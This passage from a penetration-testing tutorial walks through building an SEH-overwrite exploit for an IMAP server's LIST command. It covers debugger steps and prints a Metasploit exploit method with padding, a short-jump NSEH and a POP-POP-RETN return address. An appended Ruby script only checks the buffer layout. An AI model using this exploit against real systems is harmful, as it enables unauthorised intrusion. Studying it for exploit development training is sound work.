Chapter 14

The payload that we use at  , generic/debug_trap, won't actually send a payload. Instead, it sends multiple \xCCs, or breakpoints, to debug the execution flow of the exploit. This is useful for confirming that your shellcode is inserted at the right places in your exploit.

After running the exploit, open the Immunity Debugger, as shown in Figure 14-5, and at the crash select View > SEH chain. Set a breakpoint by pressing F2, and then press SHIFT-F9 to pass the exception to the application and step into the POP-POP-RETN sequence of instructions.

Now, still in the debugger, press F7 to single-step through the instructions until you land in the 41414141 contained in NSEH.

Figure 14-5: Landing in the POP-POP-RETN instructions

Next, edit the exploit to include the instructions for the short jump backward, as shown here:

def exploit
  connected = connect_login
  # Padding up to the NSEH slot
  lead = "\x41" * 10356
  # NSEH: short jump backward (EB F9 = jmp -7, measured from the end of
  # the two-byte instruction) followed by two NOPs
  nseh = "\xeb\xf9\x90\x90"
  # SEH: pack("A3") expects target.ret to be a string and emits exactly
  # three bytes of the POP-POP-RETN handler address
  evil = lead + nseh + [target.ret].pack("A3")
  print_status("Sending payload")
  sploit = '0002 LIST () "/' + evil + '" "PWNED"' + "\r\n"
  sock.put(sploit)
  handler
  disconnect
end
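As an added example (not the book's code or the Metasploit module), the following stand-alone Ruby script models the buffer layout above (10356-byte lead, 4-byte NSEH holding the short jump, 3-byte handler address) and performs statically the offset checks that the generic/debug_trap walkthrough confirms in the debugger. The return address is a constructed placeholder, and pack_ret3 is an assumed alternative to the page's pack("A3") for an integer target.ret.

```ruby
LEAD_LEN = 10356  # bytes of "A" padding before the NSEH slot (from the page)

# Encode a 2-byte short jump: opcode 0xEB plus a signed 8-bit displacement
# measured from the end of the instruction ("\xeb\xf9" is jmp -7).
def short_jmp(disp)
  raise ArgumentError, "short jmp range is -128..127" unless (-128..127).cover?(disp)
  "\xeb".b + [disp].pack("c")
end

# Decode the displacement of a short jump, e.g. "\xeb\xf9" => -7.
def short_jmp_disp(bytes)
  bytes = bytes.b
  raise ArgumentError, "not a short jmp" unless bytes.getbyte(0) == 0xeb
  bytes[1].unpack1("c")
end

# Pack an integer address little-endian and keep its low three bytes.
# Assumption: this is an alternative to the page's pack("A3") for the
# case where target.ret is held as an integer rather than a string.
def pack_ret3(addr)
  [addr].pack("V")[0, 3]
end

# Build the buffer with the same layout as the exploit method: padding,
# NSEH (short jump + two NOPs), then the three-byte SEH handler address.
def build_evil(ret_addr, nseh = short_jmp(-7) + "\x90\x90".b)
  ("\x41".b * LEAD_LEN) + nseh + pack_ret3(ret_addr)
end

# Offset execution reaches after the NSEH jump: NSEH offset + 2 + displacement.
def jmp_landing(nseh_offset, disp)
  nseh_offset + 2 + disp
end

# Static version of the check generic/debug_trap lets you make in the
# debugger: NSEH and SEH sit at the expected offsets and the jump lands
# inside the controlled padding rather than past the end of the buffer.
def layout_ok?(evil, ret_addr)
  nseh_off = LEAD_LEN
  seh_off  = LEAD_LEN + 4
  evil.getbyte(nseh_off) == 0xeb &&
    evil[seh_off, 3] == pack_ret3(ret_addr) &&
    (0...nseh_off).cover?(jmp_landing(nseh_off, short_jmp_disp(evil[nseh_off, 2])))
end

if __FILE__ == $0
  ret = 0x00112233  # constructed placeholder, not the real handler address
  evil = build_evil(ret)
  puts "buffer #{evil.bytesize} bytes, layout ok: #{layout_ok?(evil, ret)}"
end
```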